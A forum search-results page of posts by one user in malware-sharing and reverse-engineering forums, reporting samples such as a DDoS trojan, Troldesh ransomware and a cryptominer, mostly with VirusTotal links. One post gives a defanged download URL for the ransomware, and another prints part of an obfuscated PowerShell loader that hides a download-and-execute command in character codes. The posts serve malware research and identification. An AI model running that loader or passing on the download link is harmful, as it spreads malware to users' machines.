Search found 13 matches

by hackr8
Sat Jan 19, 2019 10:59 am
Forum: Malware
Topic: DDoS.Win32.Meganuke
Replies: 0
Views: 48

DDoS.Win32.Meganuke

DDoS trojan
VirusTotal: https://www.virustotal.com/#/file/965fe ... /detection
I haven't managed to find any other information, so I guess that it is a really rare sample.
by hackr8
Fri Jan 18, 2019 9:33 pm
Forum: Reverse Engineering and Debugging
Topic: Reversing Javascript Help
Replies: 3
Views: 120

Re: Reversing Javascript Help

Now I am getting even closer to revealing the full code. Do you mind sending me a copy of the original html though? For research purposes, of course.
by hackr8
Fri Jan 18, 2019 5:48 pm
Forum: Malware
Topic: Ransom/Shade (alias Troldesh, BetterCallSaul)
Replies: 12
Views: 15321

Re: Ransom/Shade (alias Troldesh, BetterCallSaul)

New appearance of Troldesh.A:
Download (dangerous):
hxxp://tecnologiaz.com/wp-content/themes/envo-magazine/fonts/ssj.jpg
Virustotal: https://www.virustotal.com/#/file/b62fc ... /detection
by hackr8
Thu Jan 17, 2019 3:51 pm
Forum: Malware
Topic: Trojan.JS.Delsys.A
Replies: 0
Views: 49

Trojan.JS.Delsys.A

Attempts to delete system files.
Virustotal: (39/56)
https://www.virustotal.com/#/file/a502c ... /detection
by hackr8
Thu Jan 17, 2019 11:49 am
Forum: Malware
Topic: Virus on torrent. Cryptominer.
Replies: 1
Views: 104

Re: Virus on torrent. Cryptominer.

Raw code: powershell.exe -NoPr -WINd 1 -eXEc ByP iex ("$( SeT-ITeM 'VariaBle:OFS' '')"+[StRING][CHAr[]] (73 ,69, 88, 40, 78,101 , 119 , 45, 79 ,98,106,101 , 99,116,32 ,83,121,115 ,116 ,101 ,109, 46, 78 , 101,116,46,87 , 101
AV detection: https://www.virustotal.com/#/file/9e5a3e591d0df398c90484f792a3...
by hackr8
Thu Jan 17, 2019 10:31 am
Forum: Reverse Engineering and Debugging
Topic: Reversing Javascript Help
Replies: 3
Views: 120

Re: Reversing Javascript Help

Well, I actually found the strings. Here is the light you asked for: "onmouseover", "pkcs11", "textarea", "form", "packages", "toString", "confirm", "while", "mimeTypes", "defaultStatus", "parseFloat", "top", "onmousedown", "return", "closed", "fromCharCode", "function", "abstract", "window", "doubl...
by hackr8
Thu Jan 17, 2019 10:21 am
Forum: Reverse Engineering and Debugging
Topic: Reversing Javascript Help
Replies: 3
Views: 120

Re: Reversing Javascript Help

I believe that this code was produced by a JS obfuscator. The array 'b4c45a' contains some strings that are encoded in hex and separated with quotes like " (with some indentations that I can add only manually). The other variables call parts of the content of the first array. Now, if you take t...
by hackr8
Fri Jan 11, 2019 3:41 pm
Forum: Malware
Topic: PUA FusionCore
Replies: 0
Views: 119

PUA FusionCore

A sample I found in the wild a few days ago. After a little research I found the following information:
Microsoft classified this as: PUA:Win32/FusionCore
It might be a variant of Install Core.
Contains Adware/Bloatware.
Installer made with NullSoft.
VirusTotal: https://www.virustotal.com/#/file/d7dea...
by hackr8
Fri Jan 11, 2019 3:03 pm
Forum: Malware
Topic: Trojan-000.exe
Replies: 3
Views: 1851

Re: Trojan-000.exe

Helpful links:
Removal (rootabx): https://youtu.be/vDW8KsztTMY
Removal (PandoTech): https://www.youtube.com/watch?v=Te2PT2w-2bs
Making Of and DL (FlyTech Videos): https://www.youtube.com/watch?v=e_TYnADDsLQ (Warning!!! There is a link to harmful content in the description of the video)
by hackr8
Fri Jan 11, 2019 2:44 pm
Forum: Malware
Topic: Win32/CoinMiner (Valhalla)
Replies: 3
Views: 285

Re: Help! Unknown malware.

But how did you find the source code? It is obviously obfuscated. CodeReflect gave me this when I tried to decompile it: Shared Sub NULL-SHIELD_Stop-unpacking-this-tool||You_can_not_unpack_this_programáâãäåæçèéêë7qìKîïðñ7qóôõö÷øùNULL-SHIELD_Stop-unpacking-this-tool-<Module>You_can_not_unpack_this_...